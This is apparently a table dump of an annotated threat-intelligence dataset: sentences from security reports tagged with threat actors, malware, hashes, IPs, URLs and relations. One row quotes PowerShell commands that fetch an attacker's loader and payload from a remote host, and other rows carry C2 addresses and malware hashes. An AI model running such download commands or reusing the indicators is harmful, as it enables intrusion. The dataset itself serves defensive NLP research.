id
int64 105
14.4k
| text
stringlengths 41
889
| entities
list | relations
list |
---|---|---|---|
1,542 | The Sofacy Group (AKA APT28, Grizzly Steppe, Fancy Bear, STRONTIUM, Sednit, Tsar Team, Pawn Storm) is a well-known hacking organization widely reported to be associated with Russia by the US Intelligence Community, numerous media reports and other cybersecurity companies. | [
{
"end_offset": 16,
"id": 45045,
"label": "threat-actor",
"start_offset": 4
},
{
"end_offset": 27,
"id": 45046,
"label": "threat-actor",
"start_offset": 22
},
{
"end_offset": 85,
"id": 45051,
"label": "threat-actor",
"start_offset": 76
},
{
"end_offset": 97,
"id": 45052,
"label": "threat-actor",
"start_offset": 87
},
{
"end_offset": 180,
"id": 45053,
"label": "location",
"start_offset": 174
},
{
"end_offset": 213,
"id": 45054,
"label": "identity",
"start_offset": 188
},
{
"end_offset": 43,
"id": 45047,
"label": "threat-actor",
"start_offset": 29
},
{
"end_offset": 55,
"id": 45048,
"label": "threat-actor",
"start_offset": 45
},
{
"end_offset": 66,
"id": 45049,
"label": "threat-actor",
"start_offset": 57
},
{
"end_offset": 74,
"id": 45050,
"label": "threat-actor",
"start_offset": 68
}
] | [
{
"from_id": 45045,
"id": 59,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45046,
"id": 60,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45048,
"id": 62,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45049,
"id": 63,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45050,
"id": 64,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45046,
"id": 68,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45047,
"id": 69,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45051,
"id": 65,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45052,
"id": 66,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45048,
"id": 70,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45049,
"id": 71,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45050,
"id": 72,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45047,
"id": 61,
"to_id": 45053,
"type": "located-at"
},
{
"from_id": 45051,
"id": 73,
"to_id": 45045,
"type": "duplicate-of"
},
{
"from_id": 45052,
"id": 74,
"to_id": 45045,
"type": "duplicate-of"
}
] |
207 | On Feb. 23, a malicious file named conhosts._exe (SHA256: 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591) was uploaded to a public malware repository from an organization in Kyiv, Ukraine. | [
{
"end_offset": 122,
"id": 678,
"label": "hash",
"start_offset": 58
},
{
"end_offset": 205,
"id": 44630,
"label": "location",
"start_offset": 192
},
{
"end_offset": 48,
"id": 44631,
"label": "FILEPATH",
"start_offset": 35
},
{
"end_offset": 10,
"id": 44632,
"label": "TIME",
"start_offset": 3
}
] | [
{
"from_id": 678,
"id": 133,
"to_id": 44631,
"type": "indicates"
}
] |
4,205 | During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets. | [
{
"end_offset": 125,
"id": 50019,
"label": "location",
"start_offset": 116
},
{
"end_offset": 61,
"id": 50018,
"label": "threat-actor",
"start_offset": 52
}
] | [
{
"from_id": 50018,
"id": 902,
"to_id": 50019,
"type": "targets"
}
] |
684 | While still not seen in the wild, similar exploits in Microsoft Equation Editor, such as such as CVE-2018-0807 and CVE-2018-0798, were identified by Unit 42 researchers. | [
{
"end_offset": 156,
"id": 2275,
"label": "identity",
"start_offset": 149
},
{
"end_offset": 79,
"id": 44827,
"label": "SOFTWARE",
"start_offset": 54
},
{
"end_offset": 110,
"id": 44824,
"label": "vulnerability",
"start_offset": 97
},
{
"end_offset": 128,
"id": 44825,
"label": "vulnerability",
"start_offset": 115
}
] | [
{
"from_id": 44827,
"id": 29,
"to_id": 44825,
"type": "has"
},
{
"from_id": 44827,
"id": 28,
"to_id": 44824,
"type": "has"
}
] |
2,386 | It has many of the same capabilities as another backdoor, Crosswalk, which has also been used by Earth Baku. | [
{
"end_offset": 107,
"id": 47451,
"label": "threat-actor",
"start_offset": 97
},
{
"end_offset": 67,
"id": 47450,
"label": "malware",
"start_offset": 58
}
] | [
{
"from_id": 47451,
"id": 330,
"to_id": 47450,
"type": "uses"
}
] |
3,397 | BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e news.exe | [
{
"end_offset": 110,
"id": 10258,
"label": "hash",
"start_offset": 46
},
{
"end_offset": 11,
"id": 10257,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 120,
"id": 49059,
"label": "FILEPATH",
"start_offset": 112
},
{
"end_offset": 44,
"id": 49058,
"label": "malware",
"start_offset": 20
}
] | [
{
"from_id": 49059,
"id": 626,
"to_id": 49058,
"type": "indicates"
},
{
"from_id": 10258,
"id": 627,
"to_id": 49058,
"type": "indicates"
},
{
"from_id": 10257,
"id": 624,
"to_id": 49058,
"type": "duplicate-of"
},
{
"from_id": 49059,
"id": 625,
"to_id": 10258,
"type": "duplicate-of"
}
] |
3,479 | Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux | [
{
"end_offset": 34,
"id": 49281,
"label": "malware",
"start_offset": 28
},
{
"end_offset": 51,
"id": 49282,
"label": "malware",
"start_offset": 45
},
{
"end_offset": 101,
"id": 49283,
"label": "malware",
"start_offset": 95
},
{
"end_offset": 112,
"id": 49284,
"label": "malware",
"start_offset": 106
}
] | [
{
"from_id": 49283,
"id": 778,
"to_id": 49284,
"type": "variant-of"
}
] |
3,713 | In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method. | [
{
"end_offset": 165,
"id": 49509,
"label": "attack-pattern",
"start_offset": 152
},
{
"end_offset": 11,
"id": 49510,
"label": "threat-actor",
"start_offset": 3
},
{
"end_offset": 138,
"id": 49511,
"label": "attack-pattern",
"start_offset": 110
}
] | [
{
"from_id": 49510,
"id": 812,
"to_id": 49511,
"type": "uses"
},
{
"from_id": 49510,
"id": 813,
"to_id": 49509,
"type": "uses"
}
] |
3,670 | To be more specific in terms of ATT&CK® techniques, Carbanak and FIN7 share a notable number of similarities. | [
{
"end_offset": 69,
"id": 49461,
"label": "threat-actor",
"start_offset": 65
},
{
"end_offset": 60,
"id": 49460,
"label": "threat-actor",
"start_offset": 52
}
] | [
{
"from_id": 49460,
"id": 802,
"to_id": 49461,
"type": "related-to"
}
] |
4,558 | During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites. | [
{
"end_offset": 126,
"id": 50370,
"label": "TIME",
"start_offset": 116
},
{
"end_offset": 54,
"id": 50368,
"label": "malware",
"start_offset": 34
},
{
"end_offset": 85,
"id": 50369,
"label": "SOFTWARE",
"start_offset": 78
},
{
"end_offset": 159,
"id": 50371,
"label": "attack-pattern",
"start_offset": 156
},
{
"end_offset": 183,
"id": 50372,
"label": "location",
"start_offset": 176
}
] | [
{
"from_id": 50368,
"id": 950,
"to_id": 50369,
"type": "targets"
}
] |
5,066 | Recently observed Ghostwriter credential phishing domains: | [
{
"end_offset": 29,
"id": 51172,
"label": "threat-actor",
"start_offset": 18
},
{
"end_offset": 49,
"id": 51173,
"label": "attack-pattern",
"start_offset": 30
}
] | [
{
"from_id": 51172,
"id": 1067,
"to_id": 51173,
"type": "uses"
}
] |
3,178 | Furthermore, BIOPASS RAT also creates scheduled tasks to load the Cobalt Strike shellcode during the initialization, indicating that the malicious actor behind the attack still heavily relies on Cobalt Strike. | [
{
"end_offset": 24,
"id": 48304,
"label": "malware",
"start_offset": 13
},
{
"end_offset": 79,
"id": 48305,
"label": "tools",
"start_offset": 66
},
{
"end_offset": 208,
"id": 48306,
"label": "tools",
"start_offset": 195
}
] | [
{
"from_id": 48304,
"id": 402,
"to_id": 48305,
"type": "uses"
}
] |
3,180 | In this blog entry, we will dive deeper into BIOPASS RAT with a detailed technical analysis of the infection chain, the different components of the malware, and any possible associations with Winnti. | [
{
"end_offset": 198,
"id": 48309,
"label": "threat-actor",
"start_offset": 192
},
{
"end_offset": 56,
"id": 48310,
"label": "malware",
"start_offset": 45
}
] | [
{
"from_id": 48310,
"id": 404,
"to_id": 48309,
"type": "related-to"
}
] |
2,370 | Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross. | [
{
"end_offset": 10,
"id": 45480,
"label": "threat-actor",
"start_offset": 0
},
{
"end_offset": 458,
"id": 45472,
"label": "vulnerability",
"start_offset": 444
},
{
"end_offset": 591,
"id": 45474,
"label": "malware",
"start_offset": 578
},
{
"end_offset": 609,
"id": 45475,
"label": "malware",
"start_offset": 596
},
{
"end_offset": 661,
"id": 45476,
"label": "malware",
"start_offset": 648
},
{
"end_offset": 88,
"id": 45477,
"label": "TIME",
"start_offset": 79
},
{
"end_offset": 309,
"id": 45478,
"label": "FILEPATH",
"start_offset": 294
},
{
"end_offset": 429,
"id": 45479,
"label": "vulnerability",
"start_offset": 419
},
{
"end_offset": 244,
"id": 7033,
"label": "attack-pattern",
"start_offset": 231
},
{
"end_offset": 329,
"id": 7034,
"label": "attack-pattern",
"start_offset": 315
},
{
"end_offset": 484,
"id": 7036,
"label": "malware",
"start_offset": 471
}
] | [
{
"from_id": 45479,
"id": 100,
"to_id": 45472,
"type": "duplicate-of"
},
{
"from_id": 45480,
"id": 323,
"to_id": 7033,
"type": "uses"
},
{
"from_id": 45480,
"id": 324,
"to_id": 7034,
"type": "uses"
}
] |
3,383 | BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe | [
{
"end_offset": 11,
"id": 10230,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 110,
"id": 10231,
"label": "hash",
"start_offset": 46
},
{
"end_offset": 131,
"id": 49034,
"label": "FILEPATH",
"start_offset": 112
},
{
"end_offset": 44,
"id": 49033,
"label": "malware",
"start_offset": 20
}
] | [
{
"from_id": 10230,
"id": 578,
"to_id": 49033,
"type": "duplicate-of"
},
{
"from_id": 49034,
"id": 579,
"to_id": 10231,
"type": "duplicate-of"
},
{
"from_id": 49034,
"id": 580,
"to_id": 49033,
"type": "indicates"
},
{
"from_id": 10231,
"id": 581,
"to_id": 49033,
"type": "indicates"
}
] |
4,566 | The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine. | [
{
"end_offset": 21,
"id": 50395,
"label": "campaign",
"start_offset": 4
},
{
"end_offset": 58,
"id": 50396,
"label": "attack-pattern",
"start_offset": 27
},
{
"end_offset": 92,
"id": 50397,
"label": "SOFTWARE",
"start_offset": 76
},
{
"end_offset": 184,
"id": 50398,
"label": "location",
"start_offset": 177
}
] | [
{
"from_id": 50395,
"id": 957,
"to_id": 50396,
"type": "uses"
},
{
"from_id": 50395,
"id": 958,
"to_id": 50397,
"type": "targets"
}
] |
13,543 | Instead, malicious scripts are being executed when the administrators look into customer orders in their online shop’s administration panel. | [
{
"end_offset": 69,
"id": 51614,
"label": "identity",
"start_offset": 55
},
{
"end_offset": 139,
"id": 51615,
"label": "SOFTWARE",
"start_offset": 105
},
{
"end_offset": 26,
"id": 51616,
"label": "malware",
"start_offset": 9
}
] | [
{
"from_id": 51616,
"id": 1112,
"to_id": 51615,
"type": "targets"
},
{
"from_id": 51614,
"id": 1113,
"to_id": 51615,
"type": "uses"
}
] |
4,037 | After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.exe' "%temp%/dfmanager.exe"}" C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.bin' "C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin"}" | [
{
"end_offset": 102,
"id": 49882,
"label": "attack-pattern",
"start_offset": 92
},
{
"end_offset": 405,
"id": 49888,
"label": "FILEPATH",
"start_offset": 385
},
{
"end_offset": 618,
"id": 49891,
"label": "URL",
"start_offset": 566
},
{
"end_offset": 466,
"id": 49889,
"label": "FILEPATH",
"start_offset": 409
},
{
"end_offset": 122,
"id": 49883,
"label": "tools",
"start_offset": 113
},
{
"end_offset": 190,
"id": 49884,
"label": "malware",
"start_offset": 182
},
{
"end_offset": 23,
"id": 49885,
"label": "threat-actor",
"start_offset": 10
},
{
"end_offset": 285,
"id": 49886,
"label": "FILEPATH",
"start_offset": 228
},
{
"end_offset": 382,
"id": 49887,
"label": "URL",
"start_offset": 346
},
{
"end_offset": 87,
"id": 49881,
"label": "vulnerability",
"start_offset": 68
},
{
"end_offset": 563,
"id": 49890,
"label": "URL",
"start_offset": 527
}
] | [
{
"from_id": 49885,
"id": 889,
"to_id": 49881,
"type": "exploits"
},
{
"from_id": 49885,
"id": 890,
"to_id": 49882,
"type": "uses"
},
{
"from_id": 49885,
"id": 891,
"to_id": 49883,
"type": "uses"
},
{
"from_id": 49883,
"id": 892,
"to_id": 49884,
"type": "downloads"
}
] |
1,903 | As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information. | [
{
"end_offset": 133,
"id": 47030,
"label": "attack-pattern",
"start_offset": 113
},
{
"end_offset": 15,
"id": 47029,
"label": "threat-actor",
"start_offset": 8
}
] | [
{
"from_id": 47029,
"id": 290,
"to_id": 47030,
"type": "uses"
}
] |
1,404 | Kuluoz makes money for its owner by installing other malware, such as crimeware or fake antivirus programs. | [
{
"end_offset": 6,
"id": 45008,
"label": "malware",
"start_offset": 0
},
{
"end_offset": 79,
"id": 45009,
"label": "attack-pattern",
"start_offset": 70
},
{
"end_offset": 106,
"id": 45010,
"label": "attack-pattern",
"start_offset": 83
}
] | [
{
"from_id": 45008,
"id": 53,
"to_id": 45009,
"type": "uses"
},
{
"from_id": 45008,
"id": 54,
"to_id": 45010,
"type": "uses"
}
] |
1,811 | Figure 9. The PowerShell downloading and installing AnyDeskMSI | [
{
"end_offset": 29,
"id": 5340,
"label": "tools",
"start_offset": 19
},
{
"end_offset": 67,
"id": 46932,
"label": "tools",
"start_offset": 57
}
] | [
{
"from_id": 5340,
"id": 263,
"to_id": 46932,
"type": "downloads"
}
] |
1,392 | Palo Alto Networks customers receive protections against the OctoberCMS vulnerability in the following ways: Palo Alto Networks customers receive protections against WhisperGate malware in the following ways: The Cortex XSOAR "WhisperGate & CVE-2021-32648'' pack can help automatically detect and mitigate the two threats. | [
{
"end_offset": 19,
"id": 44991,
"label": "identity",
"start_offset": 1
},
{
"end_offset": 228,
"id": 44996,
"label": "SOFTWARE",
"start_offset": 216
},
{
"end_offset": 258,
"id": 44998,
"label": "vulnerability",
"start_offset": 244
},
{
"end_offset": 129,
"id": 44993,
"label": "identity",
"start_offset": 111
},
{
"end_offset": 86,
"id": 44994,
"label": "vulnerability",
"start_offset": 62
},
{
"end_offset": 179,
"id": 44995,
"label": "malware",
"start_offset": 168
},
{
"end_offset": 241,
"id": 4172,
"label": "malware",
"start_offset": 230
}
] | [
{
"from_id": 44995,
"id": 51,
"to_id": 44998,
"type": "exploits"
},
{
"from_id": 4172,
"id": 214,
"to_id": 44998,
"type": "exploits"
}
] |
5,416 | Asus is likely only one of the vendors that is currently being targeted by Cyclops Blink. | [
{
"end_offset": 4,
"id": 51420,
"label": "identity",
"start_offset": 0
},
{
"end_offset": 88,
"id": 51421,
"label": "malware",
"start_offset": 75
}
] | [
{
"from_id": 51421,
"id": 1094,
"to_id": 51420,
"type": "targets"
}
] |
803 | Stolen credentials underpin some of the most critical and damaging attacks out there; both Shamoon 2 and the Sofacy threat actor group, for example, have made detailed use of credential theft. | [
{
"end_offset": 191,
"id": 46358,
"label": "attack-pattern",
"start_offset": 175
},
{
"end_offset": 134,
"id": 46356,
"label": "threat-actor",
"start_offset": 109
},
{
"end_offset": 100,
"id": 46357,
"label": "threat-actor",
"start_offset": 91
}
] | [
{
"from_id": 46357,
"id": 182,
"to_id": 46358,
"type": "uses"
},
{
"from_id": 46356,
"id": 183,
"to_id": 46358,
"type": "uses"
}
] |
2,596 | This was followed in short order by attacks on South American telecoms providers Claro and Embratel, Brazilian state-owned postal service “Correios,” and Portuguese media giant Impresa. | [
{
"end_offset": 110,
"id": 47784,
"label": "location",
"start_offset": 101
},
{
"end_offset": 147,
"id": 47785,
"label": "identity",
"start_offset": 139
},
{
"end_offset": 164,
"id": 47786,
"label": "location",
"start_offset": 154
},
{
"end_offset": 61,
"id": 47781,
"label": "location",
"start_offset": 47
},
{
"end_offset": 99,
"id": 47783,
"label": "identity",
"start_offset": 91
},
{
"end_offset": 184,
"id": 47787,
"label": "identity",
"start_offset": 176
},
{
"end_offset": 86,
"id": 47782,
"label": "identity",
"start_offset": 81
}
] | [
{
"from_id": 47787,
"id": 352,
"to_id": 47786,
"type": "located-at"
},
{
"from_id": 47785,
"id": 353,
"to_id": 47784,
"type": "located-at"
},
{
"from_id": 47782,
"id": 354,
"to_id": 47781,
"type": "located-at"
},
{
"from_id": 47783,
"id": 355,
"to_id": 47781,
"type": "located-at"
}
] |
14,301 | Content of the MiaKhalifa.rar file README.txt provides instructions teaching the user how to turn off the anti-virus software and how to turn on the network, which the attacker needs to steal and upload data to its C&C server. | [
{
"end_offset": 29,
"id": 48512,
"label": "FILEPATH",
"start_offset": 15
},
{
"end_offset": 125,
"id": 48515,
"label": "SOFTWARE",
"start_offset": 106
},
{
"end_offset": 45,
"id": 48513,
"label": "FILEPATH",
"start_offset": 34
},
{
"end_offset": 225,
"id": 48514,
"label": "Infrastucture",
"start_offset": 215
}
] | [
{
"from_id": 48512,
"id": 439,
"to_id": 48513,
"type": "related-to"
},
{
"from_id": 48513,
"id": 440,
"to_id": 48515,
"type": "related-to"
}
] |
4,800 | Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same. | [
{
"end_offset": 69,
"id": 50702,
"label": "location",
"start_offset": 62
},
{
"end_offset": 132,
"id": 50703,
"label": "threat-actor",
"start_offset": 121
},
{
"end_offset": 160,
"id": 50704,
"label": "location",
"start_offset": 153
},
{
"end_offset": 36,
"id": 50701,
"label": "threat-actor",
"start_offset": 5
}
] | [
{
"from_id": 50701,
"id": 986,
"to_id": 50702,
"type": "targets"
}
] |
4,165 | Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region. | [
{
"end_offset": 66,
"id": 49970,
"label": "threat-actor",
"start_offset": 53
},
{
"end_offset": 102,
"id": 49971,
"label": "location",
"start_offset": 79
}
] | [
{
"from_id": 49970,
"id": 894,
"to_id": 49971,
"type": "located-at"
}
] |
2,381 | After its payload is decrypted, StealthMutant performs process hollowing to execute its payload in a remote process. | [
{
"end_offset": 72,
"id": 7081,
"label": "attack-pattern",
"start_offset": 55
},
{
"end_offset": 45,
"id": 47444,
"label": "malware",
"start_offset": 32
}
] | [
{
"from_id": 47444,
"id": 325,
"to_id": 7081,
"type": "uses"
}
] |
13,149 | We found that Tropic Trooper’s latest activities center on targeting Taiwanese and the Philippine military’s physically isolated networks through a USBferry attack (the name derived from a sample found in a related research). | [
{
"end_offset": 28,
"id": 48927,
"label": "threat-actor",
"start_offset": 14
},
{
"end_offset": 79,
"id": 48928,
"label": "location",
"start_offset": 69
},
{
"end_offset": 98,
"id": 48929,
"label": "location",
"start_offset": 87
},
{
"end_offset": 109,
"id": 48931,
"label": "identity",
"start_offset": 98
},
{
"end_offset": 163,
"id": 48930,
"label": "malware",
"start_offset": 148
}
] | [
{
"from_id": 48931,
"id": 500,
"to_id": 48929,
"type": "located-at"
},
{
"from_id": 48931,
"id": 501,
"to_id": 48928,
"type": "located-at"
},
{
"from_id": 48927,
"id": 503,
"to_id": 48930,
"type": "uses"
},
{
"from_id": 48927,
"id": 502,
"to_id": 48931,
"type": "targets"
}
] |
3,403 | 8b5d4840bbdce0798950cd5584e3d4564581a7698bc6cfb2892c97b826129cec Silverlight_ins.exe | [
{
"end_offset": 65,
"id": 10270,
"label": "hash",
"start_offset": 1
},
{
"end_offset": 86,
"id": 49071,
"label": "FILEPATH",
"start_offset": 67
}
] | [
{
"from_id": 10270,
"id": 649,
"to_id": 49071,
"type": "duplicate-of"
}
] |
3,545 | Blackgear’s campaigns also use email as an entry point, which is why it’s important to secure the email gateway. | [
{
"end_offset": 9,
"id": 49322,
"label": "threat-actor",
"start_offset": 0
},
{
"end_offset": 54,
"id": 49323,
"label": "attack-pattern",
"start_offset": 27
}
] | [
{
"from_id": 49322,
"id": 783,
"to_id": 49323,
"type": "uses"
}
] |
13,588 | The blog post describes a web shell with two components — a PHP script and an HTML uploading file — however, the second one is not needed as the proper POST request can be created with any custom or third-party tool (e.g., Fiddler). Figure 6. | [
{
"end_offset": 35,
"id": 51676,
"label": "tools",
"start_offset": 26
},
{
"end_offset": 71,
"id": 51677,
"label": "tools",
"start_offset": 60
},
{
"end_offset": 97,
"id": 51678,
"label": "tools",
"start_offset": 78
}
] | [
{
"from_id": 51676,
"id": 1130,
"to_id": 51677,
"type": "consists-of"
},
{
"from_id": 51676,
"id": 1131,
"to_id": 51678,
"type": "consists-of"
}
] |
13,561 | As previously mentioned, Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators. | [
{
"end_offset": 37,
"id": 51638,
"label": "campaign",
"start_offset": 25
},
{
"end_offset": 95,
"id": 51639,
"label": "attack-pattern",
"start_offset": 92
},
{
"end_offset": 138,
"id": 51640,
"label": "identity",
"start_offset": 113
}
] | [
{
"from_id": 51638,
"id": 1119,
"to_id": 51640,
"type": "targets"
},
{
"from_id": 51638,
"id": 1120,
"to_id": 51639,
"type": "uses"
}
] |
3,422 | Backdoor.Win64.BIOPASS.A e52ea54cfe3afd93a53e368245c5630425e326291bf1b2599b75dbf8e75b7aeb flashplayer_install_cn.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A f1ad25b594a855a3c9af75c5da74b44d900f6fbb655033f9a98a956292011c8e Silverlight.exe | [
{
"end_offset": 132,
"id": 10311,
"label": "malware",
"start_offset": 121
},
{
"end_offset": 91,
"id": 10310,
"label": "hash",
"start_offset": 27
},
{
"end_offset": 231,
"id": 10312,
"label": "hash",
"start_offset": 167
},
{
"end_offset": 25,
"id": 49110,
"label": "malware",
"start_offset": 1
},
{
"end_offset": 165,
"id": 49111,
"label": "malware",
"start_offset": 141
},
{
"end_offset": 119,
"id": 49112,
"label": "FILEPATH",
"start_offset": 93
},
{
"end_offset": 248,
"id": 49113,
"label": "FILEPATH",
"start_offset": 233
}
] | [
{
"from_id": 49113,
"id": 716,
"to_id": 49111,
"type": "indicates"
},
{
"from_id": 10311,
"id": 717,
"to_id": 49111,
"type": "duplicate-of"
},
{
"from_id": 49112,
"id": 713,
"to_id": 10310,
"type": "duplicate-of"
},
{
"from_id": 49113,
"id": 714,
"to_id": 10312,
"type": "duplicate-of"
},
{
"from_id": 10312,
"id": 715,
"to_id": 49111,
"type": "indicates"
},
{
"from_id": 49112,
"id": 718,
"to_id": 49110,
"type": "indicates"
},
{
"from_id": 10310,
"id": 719,
"to_id": 49110,
"type": "indicates"
}
] |
336 | All of the domains currently resolve to 151.248.115.146, a Russian IP address and have WhoIs records associated with the e-mail address “ladomfichisi1987@mail.ru”. | [
{
"end_offset": 56,
"id": 1156,
"label": "IPV4",
"start_offset": 41
},
{
"end_offset": 67,
"id": 46025,
"label": "location",
"start_offset": 60
},
{
"end_offset": 162,
"id": 44703,
"label": "EMAIL",
"start_offset": 138
}
] | [
{
"from_id": 1156,
"id": 148,
"to_id": 44703,
"type": "related-to"
}
] |
600 | The attackers behind Hancitor aren’t the first to time their spam attacks like this, but it is an effective tactic to try and increase their chances of success, especially when combined with the other innovation that we’ve seen. | [
{
"end_offset": 30,
"id": 44791,
"label": "malware",
"start_offset": 22
},
{
"end_offset": 74,
"id": 44792,
"label": "attack-pattern",
"start_offset": 62
}
] | [
{
"from_id": 44791,
"id": 23,
"to_id": 44792,
"type": "uses"
}
] |
2,555 | Credential theft has been known to be a key part of the Shamoon 2 attacks. | [
{
"end_offset": 17,
"id": 47749,
"label": "attack-pattern",
"start_offset": 1
},
{
"end_offset": 66,
"id": 47750,
"label": "threat-actor",
"start_offset": 57
}
] | [
{
"from_id": 47750,
"id": 348,
"to_id": 47749,
"type": "uses"
}
] |
14,299 | In the case of the Windows variant (WORM_INFOKEY.A) of Maikspy last seen in April 2017, the user will be tricked into downloading a MiaKhalifa.rar file, which contains the files seen in the screenshot below: | [
{
"end_offset": 86,
"id": 48510,
"label": "TIME",
"start_offset": 76
},
{
"end_offset": 27,
"id": 48507,
"label": "SOFTWARE",
"start_offset": 19
},
{
"end_offset": 50,
"id": 48508,
"label": "malware",
"start_offset": 36
},
{
"end_offset": 63,
"id": 48509,
"label": "malware",
"start_offset": 55
},
{
"end_offset": 152,
"id": 48511,
"label": "FILEPATH",
"start_offset": 132
}
] | [
{
"from_id": 48508,
"id": 435,
"to_id": 48509,
"type": "related-to"
},
{
"from_id": 48508,
"id": 436,
"to_id": 48507,
"type": "duplicate-of"
},
{
"from_id": 48509,
"id": 437,
"to_id": 48510,
"type": "related-to"
},
{
"from_id": 48508,
"id": 438,
"to_id": 48511,
"type": "related-to"
}
] |
2,682 | LockBit 2.0 operators also released an information-stealer dubbed StealBit, which was developed to support affiliates of the LockBit 2.0 RaaS when exfiltrating data from breached companies. | [
{
"end_offset": 74,
"id": 45655,
"label": "malware",
"start_offset": 66
},
{
"end_offset": 11,
"id": 45654,
"label": "threat-actor",
"start_offset": 0
},
{
"end_offset": 136,
"id": 45656,
"label": "threat-actor",
"start_offset": 125
}
] | [
{
"from_id": 45655,
"id": 111,
"to_id": 45654,
"type": "authored-by"
}
] |
14,337 | Based on these findings, it’s possible that the attackers behind Maikspy operate //www[.]roundyearfun[.]org/ and hxxp://miakhalifagame[.]com/. | [
{
"end_offset": 73,
"id": 48565,
"label": "malware",
"start_offset": 65
},
{
"end_offset": 141,
"id": 48568,
"label": "URL",
"start_offset": 113
},
{
"end_offset": 108,
"id": 48566,
"label": "URL",
"start_offset": 83
}
] | [
{
"from_id": 48565,
"id": 446,
"to_id": 48566,
"type": "beacons-to"
},
{
"from_id": 48565,
"id": 447,
"to_id": 48568,
"type": "beacons-to"
}
] |
3,781 | Mirai/Gafgyt dropper scripts or variants Perl Shellbot Coinminer activity Webshell downloads (full injected command) Callback/Scanning activity Direct Download exploits where payloads were no longer live at the time of analysis: Sample hashes 801b23bffa65facee1da69bc6f72f8e1e4e1aeefc63dfd3a99b238d4f9d0a637 6d403c3fc246d6d493a6f4acc18c1c292f710db6ad9c3ea2ff065595c5ad3c5b 940a674cfe8179b2b8964bf408037e0e5a5ab7e47354fe4fa7a9289732e1f1b8 fdc94d0dedf6e53dd435d2b5eacb4c34923fadee50529db6f3de38c71f325e05 85143ecc41fb6aadd822ed2d6f20c721a83ae1088f406f29b8b0b05459053a03 bot.v 0b4b25fab4c922e752e689111f38957e0402fd83f6b1d69e8f43c6f4b68fc1ba C2 server : 5[.]39.217.212:80 | [
{
"end_offset": 67,
"id": 11449,
"label": "malware",
"start_offset": 58
},
{
"end_offset": 315,
"id": 11452,
"label": "hash",
"start_offset": 251
},
{
"end_offset": 380,
"id": 11453,
"label": "hash",
"start_offset": 316
},
{
"end_offset": 445,
"id": 11454,
"label": "hash",
"start_offset": 381
},
{
"end_offset": 510,
"id": 11455,
"label": "hash",
"start_offset": 446
},
{
"end_offset": 575,
"id": 11456,
"label": "hash",
"start_offset": 511
},
{
"end_offset": 647,
"id": 11457,
"label": "hash",
"start_offset": 583
},
{
"end_offset": 677,
"id": 49619,
"label": "IPV4",
"start_offset": 660
},
{
"end_offset": 21,
"id": 49620,
"label": "malware",
"start_offset": 1
}
] | [
{
"from_id": 11453,
"id": 845,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 11452,
"id": 844,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 11454,
"id": 846,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 11455,
"id": 847,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 11456,
"id": 848,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 11457,
"id": 849,
"to_id": 49620,
"type": "indicates"
},
{
"from_id": 49620,
"id": 850,
"to_id": 49619,
"type": "communicates-with"
}
] |
1,820 | The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions. | [
{
"end_offset": 35,
"id": 46938,
"label": "tools",
"start_offset": 28
},
{
"end_offset": 166,
"id": 46944,
"label": "tools",
"start_offset": 158
},
{
"end_offset": 321,
"id": 46951,
"label": "attack-pattern",
"start_offset": 294
},
{
"end_offset": 83,
"id": 46940,
"label": "tools",
"start_offset": 79
},
{
"end_offset": 98,
"id": 46942,
